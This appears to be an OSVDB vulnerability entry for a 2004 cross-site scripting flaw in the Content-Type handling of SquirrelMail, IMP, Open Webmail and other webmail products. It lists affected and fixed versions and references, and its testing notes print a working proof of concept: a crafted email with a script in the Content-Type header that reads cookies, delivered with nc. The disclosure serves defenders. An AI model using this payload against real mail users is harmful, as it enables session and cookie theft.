6514 : Multiple Webmail mime.php Content-Type XSS
Printer | http://osvdb.org/6514 | Email This | Edit Vulnerability

Views This Week

Views All Time

Info

Last Modified

7 months ago

Percent Complete

100%

Disclosure

May 29, 2004

Discovery

May 22, 2004

Dates

Exploit

May 29, 2004

Solution

Unknown

Description

Multiple Webmail products contain a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate Content-Type upon submission to the mime.php script (or whatever script controls header content-type). This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Classification

Location: Remote/Network Access Required
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Available
Disclosure: OSVDB Verified
OSVDB: Web Related

Solution

An upgrade is required to fix this vulnerability. Upgrade to the following versions depending on the product:

Squirrelmail: 1.4.3 or 1.5.1
IMP: 3.2.4
OpenWebmail: 2.40
IlohaMail: 0.8.13
Sqwebmail: 4.0.5
BasiliX: 1.1.1_fix1

Products

SquirrelMail Project Team	Squirrelmail	1.4.1
		1.2.x
		1.3.x
		1.4.0
		1.4.2
		1.5.0

Horde Project

IMP

3.2.3

Open Webmail Project	Open Webmail	2.10
		2.20
		2.21
		2.30
		2.32

IlohaMail

0.8.12

Sam Varshavchik

SqWebMail

4.0.4

BasiliX	BasiliX	1.1.0
		1.1.1
		1.1.1_fix1

References

Security Tracker: 1010341 1010425
Bugtraq ID: 10439 10450 10501
Secunia Advisory ID: 11734 11778 11805 11870 11875 11884 12289
ISS X-Force ID: 16285 16357
CVE ID: 2004-0520 (see also: NVD) 2004-0584 (see also: NVD)
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0050.html
http://marc.theaimsgroup.com/?l=full-disclosure&m=108588315114441&w=2
Other Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000858
http://security.gentoo.org/glsa/glsa-200406-11.xml
http://www.gentoo.org/security/en/glsa/glsa-200406-08.xml
http://www.horde.org/imp/3.2/
http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-2.txt
Vendor Specific Advisory URL: http://openwebmail.org/openwebmail/download/cert/advisories/SA-04:05.txt
http://rhn.redhat.com/errata/RHSA-2004-240.html
Vendor URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
http://www.squirrelmail.org/
http://www.squirrelmail.org/changelog.php

Tools & Filters

Nessus	12263 12503 13715 13716 14217 14228 15372

Manual Testing Notes

Testing with UW IMAP:

roman@rs-labs:~/squirrel/bug-new$ cat XSS-PoC-Squirrelmail.withquotes
helo rs-labs-r0cks
mail from:<evil@microsoft.com>
rcpt to:<squirrel@rs-labs>
data
From: Attacker <evil@microsoft.com>
To: roman@rs-labs.com
Subject: Squirrelmail XSS PoC (without quotes)
Date: Sun, 09 May 2004 22:39:58 +0200
Message-ID: <fm5t90tbzeglvqso0hc3j9u3doqc6sj5r5@4ax.com>
X-Mailer: RoMaNSoFt's preferred one :-)
MIME-Version: 1.0
Content-Type: application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf
Content-Transfer-Encoding: base64
Content-Description: Not really top secret... (without quotes)
Content-Disposition: attachment; filename=top_secret.pdf

JVBERi0xLjMKJeLjz9MKMSAwIG9iago8PAovTGVuZ3RoIDEyMTUKL0ZpbHRlciBbL0ZsYXRlRGVj
dHhyZWYKNDY2MjUKJSVFT0YK
.
quit
roman@rs-labs:~/squirrel/bug-new$ nc localhost 25 < XSS-PoC-Squirrelmail.withquotes
220 rs-labs ESMTP Exim 3.36 #1 Sun, 23 May 2004 22:52:24 +0200
250 rs-labs Hello localhost [127.0.0.1]
250 <evil@microsoft.com> is syntactically correct
250 <squirrel@rs-labs> verified
354 Enter message, ending with "." on a line by itself
250 OK id=1BRzxI-0006KA-00
221 rs-labs closing connection
roman@rs-labs:~/squirrel/bug-new$ nc localhost 143 < imap
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN] localhost IMAP4rev1 2003.339 at Sun, 23 May 2004 22:52:26 +0200 (CEST)
0 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT SCAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User squirrel authenticated
* 1 EXISTS
* 1 RECENT
* OK [UIDVALIDITY 1084621844] UID validity status
* OK [UIDNEXT 10] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS ()] Permanent flags
* OK [UNSEEN 1] first unseen message in /var/mail/squirrel
0 OK [READ-ONLY] EXAMINE completed
* SEARCH 1
0 OK SEARCH completed
* 1 FETCH (BODYSTRUCTURE ("APPLICATION" {60}
OCTET-STREAM"<SCRIPT>WINDOW.ALERT(DOCUMENT.COOKIE)</SCRIPT>" ("NAME" "top_secret.pdf") NIL "Not really top secret... (without quotes)" "BASE64" 104 NIL ("ATTACHMENT" ("FILENAME" "top_secret.pdf")) NIL NIL))
0 OK FETCH completed
* BYE rs-labs IMAP4rev1 server terminating connection
0 OK LOGOUT completed
roman@rs-labs:~/squirrel/bug-new$

Credit

Román Medina-Heigl Hernández - romanrs-labs.com -

Blogs

Provided by Technorati

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

DONATE NOW!

User Status

Account
- Login
- Sign-Up

Quick Searches

Views This Week

Views All Time

Info

Last Modified

Percent Complete

Disclosure

Discovery

Dates

Exploit

Solution

Description

Classification

Solution

Products

SquirrelMail Project Team

Squirrelmail

Horde Project

IMP

Open Webmail Project

Open Webmail

IlohaMail

IlohaMail

Sam Varshavchik

SqWebMail

BasiliX

BasiliX

References

Tools & Filters

Manual Testing Notes

Credit

Blogs

Comments